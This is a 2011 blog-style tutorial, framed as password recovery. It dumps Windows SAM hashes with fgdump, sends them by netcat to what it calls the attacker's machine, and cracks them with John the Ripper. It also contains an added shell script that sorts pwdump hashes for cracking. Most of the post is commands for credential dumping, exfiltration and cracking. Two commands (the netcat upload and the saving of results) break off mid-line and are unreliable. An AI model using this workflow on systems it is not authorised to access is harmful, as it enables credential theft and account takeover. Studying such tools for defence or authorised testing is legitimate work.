Friday, March 11, 2011

Basics of Windows password recovery

In this post I outline the basic steps of a successful Windows password recovery: dump the local password hashes with fgdump, move them to the cracking box with netcat, and crack them with John the Ripper.
Tools used: fgdump, john the ripper, netcat

On the target machine, as Administrator (fgdump needs local admin rights to read the SAM, and most antivirus products flag it):

C:\> fgdump.exe -c        # dumps the local password hashes to 127.0.0.1.pwdump in the current directory
                          # (pwdump format: user:RID:LMhash:NThash:::); -c skips the cached-credentials dump

We use netcat to move the dumped hashes to the attacker's machine (a cleartext transfer, so only do this on a network you already control). On the attacker's machine, listen and write whatever arrives to sam.txt:

$ nc -l -p 2222 > sam.txt

On the target machine, push the .pwdump file fgdump just wrote into that listener:

C:\> nc <attackers_ip> 2222 <

On the attacker's machine, start a named cracking session against the dump:

$ ./john --session=recovery1 sam.txt

A note on formats: each pwdump line carries both an LM and an NT hash. By default john picks up the LM half, which is what you want on older boxes (LM is fast to crack and case-insensitive). On Vista/2008 and later LM storage is off and the LM field is the fixed empty value aad3b435b51404eeaad3b435b51404ee, so there is nothing to crack there; run the same command with --format=nt (available in the jumbo builds) to work on the NT hashes instead.

We can stop the cracking session with ^C and resume it later from its .rec file with:

$ ./john --restore=recovery1

Pressing a key (spacebar works) while john runs prints its status line, including the current speed. Cracked passwords are stored in the john.pot file; to list them next to their user names and save them to a file, redirect the output of --show:

$ john --show sam.txt >
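As an added example (not from the original post, and not fgdump's or john's own code), the following POSIX shell script triages a pwdump-format file before you start john: it tags each account by whether it has a blank password, a real LM hash, or only an NT hash, and can split the dump so each part is run with the right --format. The sample dump is constructed: the Administrator line carries the well-known LM and NT hashes of "password", alice's NT hash is an arbitrary value, and the file names lm.txt and nt.txt in the usage comment are assumptions.

```sh
#!/bin/sh
# Triage a pwdump-format dump before handing it to john.
# Added example for this post; not fgdump's or john's own code.
# Assumed input format (what fgdump writes): user:RID:LMhash:NThash:::

# Sentinel values you will see in almost every dump:
EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM field when LM storage is disabled (or the password is empty)
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password

# Constructed sample dump (not real fgdump output). Administrator carries the
# well-known LM/NT hashes of "password"; alice's NT hash is an arbitrary value.
# The last line is deliberately not a record, to show that junk is skipped.
sample_dump() {
cat <<'EOF'
Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1001:aad3b435b51404eeaad3b435b51404ee:0123456789abcdef0123456789abcdef:::
this line is not a pwdump record
EOF
}

# tag: read a dump on stdin and prefix every valid record with its category:
#   blank    NT hash is the empty-password hash: nothing to crack, but note the account
#   lm       a real LM hash is present: crack it first, LM is fast and case-insensitive
#   nt-only  only the NT hash is usable: run john with --format=nt
tag() {
  awk -F: -v elm="$EMPTY_LM" -v ent="$EMPTY_NT" '
    NF < 4 || length($3) != 32 || length($4) != 32 { next }   # skip non-record lines
    {
      lm = tolower($3); nt = tolower($4)
      if (nt == ent)      c = "blank"
      else if (lm != elm) c = "lm"
      else                c = "nt-only"
      print c "\t" $0
    }'
}

# classify: print "user:category" per account, for a quick overview.
classify() { tag | awk -F'\t' '{ split($2, f, ":"); print f[1] ":" $1 }'; }

# select_cat CATEGORY: pass through only the original records of one category,
# so the output can go straight into a file for john.
select_cat() { tag | awk -F'\t' -v want="$1" '$1 == want { print $2 }'; }

# Intended john pipeline (assumed file names; run by hand on a real dump):
#   sample_dump | select_cat lm      > lm.txt   # then: john --format=lm lm.txt
#   sample_dump | select_cat nt-only > nt.txt   # then: john --format=nt nt.txt

# Overview of the constructed sample:
sample_dump | classify
```

Accounts tagged lm still have an NT hash worth cracking afterwards: the LM result gives the password without case, and a short NT run over the case variants recovers the exact one.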

That is the basic scenario for recovering passwords. There is more to john (cracking modes, distributing the work among several machines, trimming the key space); more on that in a future post.